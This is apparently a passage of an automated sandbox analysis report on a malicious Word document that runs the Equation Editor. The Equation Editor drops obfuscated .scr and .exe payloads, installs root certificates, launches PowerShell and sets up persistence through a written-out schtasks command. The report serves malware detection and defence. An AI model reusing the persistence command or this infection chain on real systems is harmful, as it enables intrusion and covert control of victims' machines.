                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrSection loaded: rtutils.dll
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrSection loaded: winhttp.dll
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrSection loaded: webio.dll
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrSection loaded: credssp.dll
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrSection loaded: iphlpapi.dll
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrSection loaded: winnsi.dll
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrSection loaded: dhcpcsvc6.dll
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrSection loaded: dhcpcsvc.dll
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrSection loaded: dnsapi.dll
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrSection loaded: rasadhlp.dll
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrSection loaded: secur32.dll
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrSection loaded: ncrypt.dll
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrSection loaded: gpapi.dll
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrSection loaded: vaultcli.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: wow64win.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: wow64cpu.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: ktmw32.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeSection loaded: wow64win.dll
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeSection loaded: wow64cpu.dll
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeSection loaded: bcrypt.dll
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeSection loaded: wbemcomn2.dll
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeSection loaded: rpcrtremote.dll
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeSection loaded: ntdsapi.dll
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeSection loaded: rasapi32.dll
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeSection loaded: rasman.dll
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeSection loaded: rtutils.dll
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeSection loaded: winhttp.dll
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeSection loaded: webio.dll
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeSection loaded: credssp.dll
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeSection loaded: iphlpapi.dll
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeSection loaded: winnsi.dll
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeSection loaded: dhcpcsvc6.dll
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeSection loaded: dnsapi.dll
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeSection loaded: rasadhlp.dll
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeSection loaded: secur32.dll
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeSection loaded: ncrypt.dll
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeSection loaded: gpapi.dll
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeSection loaded: vaultcli.dll
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dll
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dll
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dll
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dll
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dll
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dll
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32Jump to behavior
                    Source: Scan 368 1.LNK.0.drLNK file: ..\..\..\..\..\Desktop\Scan 368 1.doc
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior

                    Data Obfuscation

                    barindex
                    .NET source code contains potential unpacker
                    Source: 5.2.obimohohj75.scr.61d0000.10.raw.unpack, G2ZSj4grjIGLRxUPme.cs.Net Code: P5aVvXVtpi System.Reflection.Assembly.Load(byte[])
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_002E412C push edx; ret 2_2_002E44D7
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_002E6026 push ebx; ret 2_2_002E6027
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_002E5C3E push esp; ret 2_2_002E5C3F
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_002DC10C pushfd ; retf 002Dh2_2_002DC10D
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_002E601E push ebx; ret 2_2_002E601F
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_002E4067 pushfd ; iretd 2_2_002E4101
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_002DE466 pushad ; retf 2_2_002DE4F4
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_002D8F60 push eax; retf 2_2_002D8F61
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_002D9778 pushad ; ret 2_2_002D9779
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_002DC278 push eax; retn 002Dh2_2_002DC27D
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_002DC340 push C8002DC3h; retn 002Dh2_2_002DC345
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_002E5FBD push edx; ret 2_2_002E5FBF
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_002E5CB5 push edx; ret 2_2_002E5CB7
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_002DB58A push edx; retf 2_2_002DB58B
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_002E5E9F push esp; ret 2_2_002E5EBB
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_002E44E5 push edx; ret 2_2_002E44E7
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_002DB6C9 pushad ; ret 2_2_002DB6F5
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_002E5EC2 push esp; ret 2_2_002E5EC3
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_002E44DB push edx; ret 2_2_002E44DF
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrCode function: 5_2_001D328A push eax; retf 5_2_001D32B1
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrCode function: 5_2_001D32BD pushad ; retf 5_2_001D32C1
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrCode function: 5_2_001D6564 pushad ; retf 5_2_001D6565
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeCode function: 13_2_00349AAA push 8B00386Fh; iretd 13_2_00349AAF
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeCode function: 13_2_0034328A push eax; retf 13_2_003432B1
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeCode function: 13_2_00346564 pushad ; retf 13_2_00346565
                    Source: xobizx[1].scr.2.drStatic PE information: section name: .text entropy: 7.972982095360775
                    Source: obimohohj75.scr.2.drStatic PE information: section name: .text entropy: 7.972982095360775
                    Source: pgZzUFYKXcIRkU.exe.5.drStatic PE information: section name: .text entropy: 7.972982095360775
                    Source: 5.2.obimohohj75.scr.61d0000.10.raw.unpack, PVkO9JPMvYVLdClLiN.csHigh entropy of concatenated method names: 'O6IweqlMMq', 'TANwRH6kgp', 'bGvwEfJ77Z', 'rM8w9FZrkv', 'Fixw6GvwZc', 'PDywFT5kk0', 'XELwi24PNo', 'SJWwKXd5KJ', 'XTbwqV1n72', 'EwDwdRKlLJ'
                    Source: 5.2.obimohohj75.scr.61d0000.10.raw.unpack, G2ZSj4grjIGLRxUPme.csHigh entropy of concatenated method names: 'YIhPIsXwfr', 'VVrPpluOgh', 'kffP51yyQY', 'OvvPQvVSgK', 'DX3PGXwffY', 'Tv8PlxpmSe', 'R7gP36uZTf', 'qPNPr0PA3V', 'NMoPTg8rTC', 'i7sPBnh4e3'
                    Source: 5.2.obimohohj75.scr.61d0000.10.raw.unpack, wGPs2vQ5cYwwpfdFSH.csHigh entropy of concatenated method names: 'Dispose', 'uS9bX3QGmU', 'beEn9lFdKd', 'n6yaaoa0lg', 'nkXbNlSmSw', 'qKNbzo24Ds', 'ProcessDialogKey', 'qjvn43RO6w', 'uYjnbasTPQ', 'zjLnnf6rJV'
                    Source: 5.2.obimohohj75.scr.61d0000.10.raw.unpack, TqrvIDXhqvyk4oYo0r.csHigh entropy of concatenated method names: 'tfmYuGBEIE', 'G7mYNOU9Un', 'ej6g4l4Kcb', 'rBFgbS3TQr', 'EjeYdJuwGn', 'KtIYs01sHl', 'oVDYAAyNDM', 'uPhYMO91vG', 'tELYtIvJ4G', 'ykGY748qiu'
                    Source: 5.2.obimohohj75.scr.61d0000.10.raw.unpack, r7NahfGaRHXpwgcPPG.csHigh entropy of concatenated method names: 'uVpGm3nCBi', 'W79GSJ6Wof', 'LmGQ0fQVbd', 'gkXQ6oXtng', 'qcbQF2sath', 'W8rQjQ9LHr', 'be7Qih5Ubd', 'RhlQKUUuIP', 'OMTQWlnEe0', 'eKsQq0qSfL'
                    Source: 5.2.obimohohj75.scr.61d0000.10.raw.unpack, qwk4Qv9QyJCsNVKKDQ.csHigh entropy of concatenated method names: 'Udj1bMaVsi', 'nMH1PuDKRs', 'iZE1VkblbB', 'Yw81pfPXcy', 'E4u15jsu3V', 'M5P1G8A6vY', 'vr81l9lpc9', 'h6FgLdgCsv', 'hSjgufeTDa', 'bLrgXdrXab'
                    Source: 5.2.obimohohj75.scr.61d0000.10.raw.unpack, EvTKrVrZpdRryOCsZq.csHigh entropy of concatenated method names: 'ksHgEXIT20', 'hE4g9dC4ma', 'Tkrg0iChJj', 'o2Gg64uxlJ', 'TPygMYEqVJ', 'CZpgF3begY', 'Next', 'Next', 'Next', 'NextBytes'
                    Source: 5.2.obimohohj75.scr.61d0000.10.raw.unpack, ayoI2QBSC5k9Z01VqM.csHigh entropy of concatenated method names: 'lgovgW8gX', 'I2ACoa5tu', 'OgUkVvfe4', 'hnaSj06D8', 'C09R0Gywf', 'f1oHyVKvQ', 'E2aCOrQpiLXr2oBsR7', 'ftMvVEnB3Yc9XUxYKk', 'hIegt8GCq', 'hCVhByf6x'
                    Source: 5.2.obimohohj75.scr.61d0000.10.raw.unpack, BeQ1AODg6yeryL4ZqA.csHigh entropy of concatenated method names: 'IY9gpXI0H6', 'qbEg5B9Qwv', 'my5gQm4Req', 'FPxgGA67Ag', 'sLdglTndow', 'GvZg3gw0wp', 'sg0grXqF5m', 'FvvgTgXmty', 'F9JgBhTm0b', 'HnogfhAqBO'
                    Source: 5.2.obimohohj75.scr.61d0000.10.raw.unpack, SVlNQVmaF6b5jAqO4n.csHigh entropy of concatenated method names: 'RBUlIPDtbo', 'JHjl50Orrt', 'm1xlGhhhUm', 'EsCl3vlvi8', 's5Plry7g6b', 'hWjG2fYg6f', 'DrlGOCTy6J', 'vyYGLc8c3l', 'UnpGuUB1EE', 'sPFGXoEm27'
                    Source: 5.2.obimohohj75.scr.61d0000.10.raw.unpack, hpPwguNbTVJhGmC5km.csHigh entropy of concatenated method names: 'oB2QCPFPgI', 'YPiQkw9di2', 'iyFQepyOBY', 'GphQRBkdD9', 'pi6QxbXpf5', 'eajQc7itEK', 'qKNQYTyXMC', 'uB1Qgi0Hxf', 'QuNQ1MxF17', 'PtVQh7PpiT'
                    Source: 5.2.obimohohj75.scr.61d0000.10.raw.unpack, XAJRNj3qJUtDMUjdFC.csHigh entropy of concatenated method names: 'd6g3pj1OTn', 'wFJ3QBktl4', 'ein3l5DLkR', 'KUUlNdVrFk', 'Bfelz1JSuk', 'vtV340pdvK', 'Qs43bRH9tm', 'P9p3nJLSZA', 'Prf3P6JQvi', 'F2f3VtyiUv'
                    Source: 5.2.obimohohj75.scr.61d0000.10.raw.unpack, mr35evWRIA6iQ3eJNAp.csHigh entropy of concatenated method names: 'eRi1JfjkT2', 'fXp1yHs2mW', 'njE1vFA6Gd', 'Smf1CjiGl8', 'iGC1mDK56w', 'B5b1kUQrKJ', 'W0Y1SIhxpW', 'EB21eJAkpp', 'rNR1RBJH3p', 'mnh1HxoRwQ'
                    Source: 5.2.obimohohj75.scr.61d0000.10.raw.unpack, w41cn5eEcjXfVPc9W3.csHigh entropy of concatenated method names: 'HKob3rBlE3', 'Bi7bro8Jsc', 'C53bBb0bSw', 'xn0bf11WC3', 'BTgbxBYA4y', 'TkPbcd8w5Y', 'Oi0jjcL0PVlYobv2fx', 'H85hNKNv6R1UjIdrs2', 'QP2bb3USh4', 'ANCbPdDU0x'
                    Source: 5.2.obimohohj75.scr.61d0000.10.raw.unpack, t2dMxJW6jcRIsPOcotc.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'SCFhMxbSAV', 'zmRhtjKkQ0', 'eiKh7OAnN1', 'jR7hUPF1O5', 'AE3h26VhKE', 'xYXhOkDjlp', 'GWnhLvaKhv'
                    Source: 5.2.obimohohj75.scr.61d0000.10.raw.unpack, NZ3F1JZLvRhU8cxwHy.csHigh entropy of concatenated method names: 'IPA5M3VwxE', 'aka5tgU2MO', 'j7r57WIwqO', 'uQM5UfovU6', 'MlF52FEjAr', 'Sab5OISHt2', 'FPT5LfMtc5', 'lKO5u6xso0', 'rdq5XhgYAh', 'omZ5N8Ns0u'
                    Source: 5.2.obimohohj75.scr.61d0000.10.raw.unpack, EYWFh7SMXfbjDQJxdS.csHigh entropy of concatenated method names: 'zEE3JKpQAH', 'Ro63ycSvIc', 'pe33vDv3pN', 'vQs3CdFmU4', 'fdb3m4pwI9', 'Elc3kgJwQL', 'C053SZxhuZ', 'DqT3erjTFv', 'yBg3RnFRgD', 'xfb3H1k1Xh'

                    Persistence and Installation Behavior

                    barindex
                    Drops PE files with a suspicious file extension
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\xobizx[1].scrJump to dropped file
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\obimohohj75.scrJump to dropped file
                    Installs new ROOT certificates
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXERegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXERegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXERegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXERegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXERegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXERegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXERegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\xobizx[1].scrJump to dropped file
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrFile created: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeJump to dropped file
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\obimohohj75.scrJump to dropped file

                    Boot Survival

                    barindex
                    Uses schtasks.exe or at.exe to add and modify task schedules
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pgZzUFYKXcIRkU" /XML "C:\Users\user\AppData\Local\Temp\tmp786B.tmp"
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXERegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOTJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
